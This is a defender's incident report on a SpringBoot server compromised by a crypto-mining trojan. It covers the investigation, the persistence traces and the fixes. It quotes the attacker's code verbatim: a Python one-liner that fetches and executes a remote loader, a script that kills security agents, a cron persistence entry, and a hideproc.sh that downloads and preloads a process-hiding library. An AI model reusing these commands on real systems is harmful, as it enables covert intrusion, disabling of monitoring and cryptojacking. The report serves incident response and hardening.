How a SpringBoot Server Was Hijacked for Crypto Mining – Investigation & Fixes

Server Invasion Mining Process

Incident

While using a phone in bed, the author received an Alibaba Cloud SMS and email alert indicating abnormal server behavior. The email revealed a serious issue, prompting immediate investigation.

Using netstat a suspicious port was found without an associated program name, suggesting a Java process had been remotely executed (RCE) and possibly a rootkit installed.

The primary concern was maintaining service availability, so a new instance was launched and traffic migrated. The compromised server was then shut down for forensic analysis.

Intrusion Behavior Analysis

The compromised SpringBoot application was get‑shelled and executed remote code. The base64‑decoded command was:

python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()'

The downloaded Python script performed the following actions:

import sysimport osfrom os.path import expanduser
ver=sys.version
shs='''ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
... (multiple similar lines removing various processes) ...
'''os.system(shs)
# download and execute kworkers binary
...

The remote code mainly:

Uninstalled security monitoring tools (e.g., Alibaba Cloud Shield).

Killed all kworkers processes.

Created a .git directory, downloaded the kworkers mining program, and executed it.

Investigation of kworkers revealed it is a cryptocurrency mining tool. Cloud monitoring showed a short CPU spike lasting about five minutes before the author intervened.

Server Residual Traces

After rebooting, the following evidence was found:

1. Scheduled tasks:

# crontab -l
0 2 * * * /xxx/.git/kworkers

The trojan added a cron job for persistence.

2. Files in the trojan’s home directory: additional cert_key.pem and cert.pem files containing public and private keys.

3. Log excerpts showing downloads and credential harvesting:

/xxx/.git
... (log lines indicating downloads of various scripts, password extraction, network scans, etc.) ...

4. hideproc.sh script: compiles a shared library libc2.28.so to hide processes via /etc/ld.so.preload, explaining why netstat could not reveal the malicious process name.

if [ "$EUID" -ne 0 ]; then echo "Please run as root"; else
  if grep libc2.28 /etc/ld.so.preload; then echo "hideproc already done!!"; else
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools" -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
  fi
fi

5. Network activity: an IP from Beijing was observed brute‑forcing the server.

Server Invasion Mining Mitigation

Although the exact vulnerable SpringBoot package was not identified, the following mitigation steps were applied:

Reinstalled the operating system on the compromised server.

Ran the SpringBoot application under a non‑root user.

Added basic authentication for the subsystem using Nginx:

apt install -y apache2-utils
htpasswd /etc/nginx/conf.d/.htpasswd user

server {
  ...
  auth_basic "Subsystem Authentication:";
  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
  ...
}

Restricted outbound connections via firewall rules.

These measures reduce the likelihood of recurrence, but locating and patching the underlying application vulnerability remains essential.

Conclusion

The breach turned out to be a mining trojan, leaving core data untouched. Key lessons include avoiding running services as root, tightening firewall policies, maintaining robust security monitoring, and ensuring regular data backups.